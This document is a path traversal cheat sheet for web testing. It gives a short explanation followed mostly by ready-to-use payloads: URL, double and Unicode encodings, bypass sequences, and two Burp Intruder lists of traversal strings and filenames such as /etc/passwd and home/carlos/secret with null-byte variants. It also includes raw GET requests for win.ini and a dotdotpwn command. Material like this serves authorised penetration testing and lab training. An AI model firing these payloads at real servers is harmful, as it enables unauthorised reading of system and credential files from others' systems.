Path Traversal

Path traversal attacks

A directory traversal vulnerability can be present inside a web server, inside an application framework (during the HTTP request pre-processing and routing), or within an application endpoint that processes data according to application logic (for example, reading a file from storage based on its name).

Platform - Filename and Path

You need to figure out a platform in order to know how to address specific files. For Linux, a good file to read is/etc/passwwhich is readable every time. On Windows, you can choose C:\Windows\win.ini

Simple

../../../etc/passwd

URL encoding

. = %2e
/ = %2f
\ = %5c

Double URL encoding

. = %252e
/ = %252f
\ = %255c

UTF-8 bit Unicode

. = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c

16 bit Unicode

. = %u002e
/ = %u2215
\ = %u2216

Bypass Path Sequence

../
.../
..../
..\
..\/
..;/
..././
...\.\
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216

Intruder

Don't forget to disable URL encoding for the both next Payloads (payload1,payload2)

Payload 1 - Traversal directory sequence, deep 6

../
../../
../../../
../../../../
../../../../../
../../../../../../
.../
.../.../
.../.../.../
.../.../.../.../
.../.../.../.../.../
.../.../.../.../.../.../
...//
...//...//
...//...//...//
...//...//...//...//
...//...//...//...//...//
...//...//...//...//...//...//
....//....//
....//....//....//
....//....//....//....//
....//....//....//....//....//
....//....//....//....//....//....//
..\
..\..\
..\..\..\
..\..\..\..\
..\..\..\..\..\
..\..\..\..\..\..\
...\
...\...\
...\...\...\
...\...\...\...\
...\...\...\...\...\
...\...\...\...\...\...\
....\\....\\
....\\....\\....\\
....\\....\\....\\....\\
....\\....\\....\\....\\....\\
....\\....\\....\\....\\....\\....\\
....\/
....\/....\/
....\/....\/....\/
....\/....\/....\/....\/
....\/....\/....\/....\/....\/
....\/....\/....\/....\/....\/....\/
..\/
..\/..\/
..\/..\/..\/
..\/..\/..\/..\/
..\/..\/..\/..\/..\/
..\/..\/..\/..\/..\/..\/
..;/
..;/..;/
..;/..;/..;/
..;/..;/..;/..;/
..;/..;/..;/..;/..;/
..;/..;/..;/..;/..;/..;/
..././
..././..././
..././..././..././
..././..././..././..././
..././..././..././..././..././
..././..././..././..././..././..././
...\.\
...\.\...\.\
...\.\...\.\...\.\
...\.\...\.\...\.\...\.\
...\.\...\.\...\.\...\.\...\.\
...\.\...\.\...\.\...\.\...\.\...\.\
%2e%2e%2f
%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%252e%252e%252f
%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
..%c0%af
..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af
..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f
%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2215%uff0e%uff0e%u2215
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
%uff0e%uff0e%u2216%uff0e%uff0e%u2216
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216

Payload 2 - Filename

etc/passwd
etc/passwd%00
etc/passwd%00.jpg
etc/passwd%00.png
etc//passwd
etc\passwd
etc\\passwd
etc%2fpasswd
etc%252fpasswd
etc%c0%afpasswd
etc%c0%af%e0%80%afpasswd
etc%c0%2fpasswd
etc%c0%5cpasswd
etc%c0%80%5cpasswd
etc%u2215passwd
etc%u2216passwd
home/carlos/secret
home/carlos/secret%00
home/carlos/secret%00.jpg
home/carlos/secret%00.png
home//carlos//secret
home\carlos\secret
home\\carlos\\secret
home%2fcarlos%2fsecret
home%252fcarlos%252fsecret
home%c0%afcarlos%c0%afsecret
home%c0%af%e0%80%afcarlos%c0%af%e0%80%afsecret
home%c0%2fcarlos%c0%2fsecret
home%c0%5ccarlos%c0%5csecret
home%c0%80%5ccarlos%c0%80%5csecret
home%u2215carlos%u2215secret
home%u2216carlos%u2216secret

Web Server Path Traversal Attacks

GET C:/Windows/win.ini
GET /C:/Windows/win.ini
GET file:///Windows/win.ini
GET /~/Windows/win.ini

Tools

DotDotPwn

dotdotpwn -m http-url -u https://example.com/TRAVERSAL -f /etc/passwd -k root  

References

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal https://gracefulsecurity.com/path-traversal-cheat-sheet-linux/ https://www.kali.org/tools/dotdotpwn/